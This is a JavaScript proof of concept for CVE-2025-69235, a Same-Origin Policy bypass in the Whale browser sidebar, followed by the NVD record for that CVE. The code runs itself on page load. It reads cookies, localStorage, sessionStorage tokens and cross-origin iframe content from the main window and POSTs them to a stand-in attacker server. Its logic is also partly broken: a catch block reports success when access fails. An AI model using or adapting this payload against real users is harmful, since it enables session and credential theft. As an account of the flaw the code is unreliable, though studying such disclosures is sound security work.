CVE-2025-69235

// CVE-2025-69235 PoC - Same-Origin Policy Bypass in Whale Browser Sidebar // This PoC demonstrates the SOP bypass vulnerability in Whale browser's sidebar environment // Attack scenario: Malicious page in sidebar accessing data from main browsing context const attackPayload = { // Step 1: Detect if running in Whale browser sidebar isWhaleSidebar: function() { try { // Check for Whale-specific APIs or behaviors return window !== window.parent || (window.external && window.external.whale) || document.domain !== window.top.location.hostname; } catch (e) { return false; } }, // Step 2: Attempt to access cross-origin data through sidebar exploitSOPBypass: async function() { const results = { success: false, stolenData: null, error: null }; try { // Attempt to access top window's document in sidebar context // This should be blocked by SOP, but the vulnerability allows bypass const topWindow = window.top; // Try to access document content (SOP bypass) if (topWindow && topWindow.document) { // Steal page content through sidebar results.stolenData = { title: topWindow.document.title, cookies: topWindow.document.cookie, localStorage: this.extractLocalStorage(topWindow), sessionStorage: this.extractSessionStorage(topWindow) }; results.success = true; } // Attempt to read iframe content across origins const iframes = topWindow.document.getElementsByTagName('iframe'); for (let iframe of iframes) { try { const iframeDoc = iframe.contentDocument || iframe.contentWindow.document; if (iframeDoc) { results.stolenData.iframeData = iframeDoc.body.innerHTML; } } catch (e) { // Expected to fail normally, but succeeds with vulnerability console.log('Iframe access successful (vulnerability present)'); } } } catch (e) { results.error = e.message; } return results; }, // Helper functions extractLocalStorage: function(win) { try { return win.localStorage.getItem('sensitive_data'); } catch (e) { return null; } }, extractSessionStorage: function(win) { try { return win.sessionStorage.getItem('session_token'); } catch (e) { return null; } }, // Step 3: Exfiltrate stolen data exfiltrateData: function(data) { const exfilEndpoint = 'https://attacker-controlled-server.com/collect'; fetch(exfilEndpoint, { method: 'POST', body: JSON.stringify(data), mode: 'no-cors' }); } }; // Execute attack when page loads document.addEventListener('DOMContentLoaded', async () => { if (attackPayload.isWhaleSidebar()) { const results = await attackPayload.exploitSOPBypass(); if (results.success) { attackPayload.exfiltrateData(results.stolenData); } } });

{"cve": {"id": "CVE-2025-69235", "sourceIdentifier": "[email protected]", "published": "2025-12-30T02:16:16.930", "lastModified": "2026-01-13T21:42:46.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Whale browser before 4.35.351.12 allows an attacker to bypass the Same-Origin Policy in a sidebar environment."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:navercorp:whale:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.35.351.12", "matchCriteriaId": "190A5B33-48F9-47DD-902A-63554FF53365"}]}]}], "references": [{"url": "https://cve.naver.com/detail/cve-2025-69235.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}